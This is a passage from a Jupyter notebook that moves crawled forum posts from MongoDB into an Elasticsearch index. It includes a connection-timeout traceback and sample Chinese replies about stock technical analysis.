153 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(sock, request_id, max_message_size)\u001b[0m\n\u001b[0;32m 172\u001b[0m length, _, response_to, op_code = _UNPACK_HEADER(\n\u001b[1;32m--> 173\u001b[1;33m _receive_data_on_socket(sock, 16))\n\u001b[0m\u001b[0;32m 174\u001b[0m \u001b[1;31m# No request_id for exhaust cursor \"getMore\".\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
154 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36m_receive_data_on_socket\u001b[1;34m(sock, length)\u001b[0m\n\u001b[0;32m 231\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 232\u001b[1;33m \u001b[0mchunk_length\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mrecv_into\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmv\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mbytes_read\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 233\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mIOError\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mOSError\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
155 | "\u001b[1;31mTimeoutError\u001b[0m: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。",
156 | "\nDuring handling of the above exception, another exception occurred:\n",
157 | "\u001b[1;31mAutoReconnect\u001b[0m Traceback (most recent call last)",
158 | "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m()\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[0murl_set\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mset\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[1;32mfor\u001b[0m \u001b[0mitem\u001b[0m \u001b[1;32min\u001b[0m \u001b[0mdoc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mfind\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3\u001b[0m \u001b[0mcreator\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'creator'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 4\u001b[0m \u001b[0mtitle\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'title'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5\u001b[0m \u001b[0mcontent\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'content'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
159 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36mnext\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1187\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__empty\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1188\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mStopIteration\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1189\u001b[1;33m \u001b[1;32mif\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_refresh\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1190\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__manipulate\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1191\u001b[0m \u001b[0m_db\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
160 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m_refresh\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1124\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclient\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1125\u001b[0m self.__max_await_time_ms)\n\u001b[1;32m-> 1126\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__send_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1127\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1128\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
161 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m__send_message\u001b[1;34m(self, operation)\u001b[0m\n\u001b[0;32m 929\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 930\u001b[0m response = client._send_message_with_response(\n\u001b[1;32m--> 931\u001b[1;33m operation, exhaust=self.__exhaust, address=self.__address)\n\u001b[0m\u001b[0;32m 932\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__address\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mresponse\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 933\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__exhaust\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
162 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_send_message_with_response\u001b[1;34m(self, operation, exhaust, address)\u001b[0m\n\u001b[0;32m 1143\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__all_credentials\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1144\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_event_listeners\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1145\u001b[1;33m exhaust)\n\u001b[0m\u001b[0;32m 1146\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1147\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_reset_on_error\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mserver\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
163 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_reset_on_error\u001b[1;34m(self, server, func, *args, **kwargs)\u001b[0m\n\u001b[0;32m 1154\u001b[0m \"\"\"\n\u001b[0;32m 1155\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1156\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1157\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1158\u001b[0m \u001b[1;31m# The socket has been closed. Don't reset the server.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
164 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\server.py\u001b[0m in \u001b[0;36msend_message_with_response\u001b[1;34m(self, operation, set_slave_okay, all_credentials, listeners, exhaust)\u001b[0m\n\u001b[0;32m 104\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 105\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msend_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mdata\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmax_doc_size\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 106\u001b[1;33m \u001b[0mreply\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mreceive_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mrequest_id\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 107\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 108\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mpublish\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
165 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 610\u001b[0m self.max_message_size)\n\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 612\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 613\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 614\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_raise_if_not_writable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0munacknowledged\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
166 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(self, error)\u001b[0m\n\u001b[0;32m 741\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 742\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 743\u001b[1;33m \u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 744\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 745\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
167 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(address, error, msg_prefix)\u001b[0m\n\u001b[0;32m 281\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 282\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 283\u001b[1;33m \u001b[1;32mraise\u001b[0m \u001b[0mAutoReconnect\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 284\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 285\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n",
168 | "\u001b[1;31mAutoReconnect\u001b[0m: 10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。"
169 | ]
170 | }
171 | ],
172 | "source": [
173 | "url_set = set()\n",
174 | "for item in doc.find():\n",
175 | " creator=item.get('creator')\n",
176 | " title=item.get('title')\n",
177 | " content=item.get('content')\n",
178 | " resp_no=item.get('resp_no')\n",
179 | " createTime=item.get('createTime')\n",
180 | " \n",
181 | " url=item.get('url')\n",
182 | " if url in url_set:\n",
183 | " continue\n",
184 | " else:\n",
185 | " url_set.add(url)\n",
186 | " \n",
187 | " if createTime is None:\n",
188 | " save_db.insert_one({'url':url})\n",
189 | " continue\n",
190 | " \n",
191 | " createTime=datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n",
192 | "\n",
193 | " crawlTime=item.get('crawlTime')\n",
194 | " crawlTime=datetime.datetime.strptime(crawlTime,'%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S')\n",
195 | "\n",
196 | " \n",
197 | " resp_list=item.get('resp')\n",
198 | " last_resp_date=item.get('last_resp_date')\n",
199 | " last_resp_date=datetime.datetime.strptime(last_resp_date,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n",
200 | "\n",
201 | " _resp_list=[]\n",
202 | " for sub_resp in resp_list:\n",
203 | " resp_author = list(sub_resp.keys())[0]\n",
204 | " _resp_author=''.join(resp_author.split('_')[:-1])\n",
205 | " agree=sub_resp[resp_author][0]\n",
206 | " resp_content=sub_resp[resp_author][1]\n",
207 | " d={}\n",
208 | " d['resp_agree']=int(agree)\n",
209 | " d['resp_author']=_resp_author\n",
210 | " d['resp_content']=resp_content\n",
211 | "\n",
212 | " _resp_list.append(d)\n",
213 | " # last_resp_date=item.get('last_resp_date')\n",
214 | "\n",
215 | " body = {\n",
216 | " 'creator':creator,\n",
217 | " 'title':title,\n",
218 | " 'content':content,\n",
219 | " 'resp_no':int(resp_no),\n",
220 | " 'createTime':createTime,\n",
221 | " 'crawlTime':crawlTime,\n",
222 | " 'url':url,\n",
223 | " 'resp':_resp_list,\n",
224 | " 'last_resp_date':last_resp_date\n",
225 | " }\n",
226 | "\n",
227 | " es.index(index='jsl',doc_type='doc',body=body)"
228 | ]
229 | },
230 | {
231 | "cell_type": "code",
232 | "execution_count": 23,
233 | "metadata": {},
234 | "outputs": [
235 | {
236 | "data": {
237 | "text/plain": [
238 | "'2019-03-16 09:54:43'"
239 | ]
240 | },
241 | "execution_count": 23,
242 | "metadata": {},
243 | "output_type": "execute_result"
244 | }
245 | ],
246 | "source": [
247 | "crawlTime"
248 | ]
249 | },
250 | {
251 | "cell_type": "code",
252 | "execution_count": 19,
253 | "metadata": {},
254 | "outputs": [
255 | {
256 | "data": {
257 | "text/plain": [
258 | "[{'resp_agree': 0,\n",
259 | " 'resp_author': 'seeker24680',\n",
260 | " 'resp_content': '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。'},\n",
261 | " {'resp_agree': 0,\n",
262 | " 'resp_author': 'joyfulli',\n",
263 | " 'resp_content': '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了'},\n",
264 | " {'resp_agree': 0, 'resp_author': '老高0813', 'resp_content': '基本没卵用'},\n",
265 | " {'resp_agree': 0, 'resp_author': 'z383788052', 'resp_content': '从来只看指标,只看k'},\n",
266 | " {'resp_agree': 0,\n",
267 | " 'resp_author': '花园小琴',\n",
268 | " 'resp_content': '看图形,一般只看低买高卖,但事后后悔,赚少了'},\n",
269 | " {'resp_agree': 0,\n",
270 | " 'resp_author': '风险搬运工',\n",
271 | " 'resp_content': '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。'},\n",
272 | " {'resp_agree': 0,\n",
273 | " 'resp_author': 'smag',\n",
274 | " 'resp_content': '基本不看指标,静下心感受波动,在波动中下注。。。'},\n",
275 | " {'resp_agree': 0, 'resp_author': '海浪头头', 'resp_content': '同意美棠子的看法'},\n",
276 | " {'resp_agree': 0,\n",
277 | " 'resp_author': 'jsl0900',\n",
278 | " 'resp_content': '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题'},\n",
279 | " {'resp_agree': 4,\n",
280 | " 'resp_author': '美棠子',\n",
281 | " 'resp_content': '只是个辅助工具,基本面是核心,切不可颠倒主次。'},\n",
282 | " {'resp_agree': 0, 'resp_author': '蔓越橘', 'resp_content': '用于T一下可以,其他就算了吧。'}]"
283 | ]
284 | },
285 | "execution_count": 19,
286 | "metadata": {},
287 | "output_type": "execute_result"
288 | }
289 | ],
290 | "source": [
291 | "_resp_list"
292 | ]
293 | },
294 | {
295 | "cell_type": "code",
296 | "execution_count": null,
297 | "metadata": {
298 | "scrolled": true
299 | },
300 | "outputs": [],
301 | "source": [
302 |     "for key in doc.find_one(): print(key)\n"
303 | ]
304 | },
305 | {
306 | "cell_type": "code",
307 | "execution_count": null,
308 | "metadata": {},
309 | "outputs": [],
310 | "source": [
311 | "db"
312 | ]
313 | }
314 | ],
315 | "metadata": {
316 | "kernelspec": {
317 | "display_name": "Python 3",
318 | "language": "python",
319 | "name": "python3"
320 | },
321 | "language_info": {
322 | "codemirror_mode": {
323 | "name": "ipython",
324 | "version": 3
325 | },
326 | "file_extension": ".py",
327 | "mimetype": "text/x-python",
328 | "name": "python",
329 | "nbconvert_exporter": "python",
330 | "pygments_lexer": "ipython3",
331 | "version": "3.7.0"
332 | }
333 | },
334 | "nbformat": 4,
335 | "nbformat_minor": 2
336 | }
337 |
--------------------------------------------------------------------------------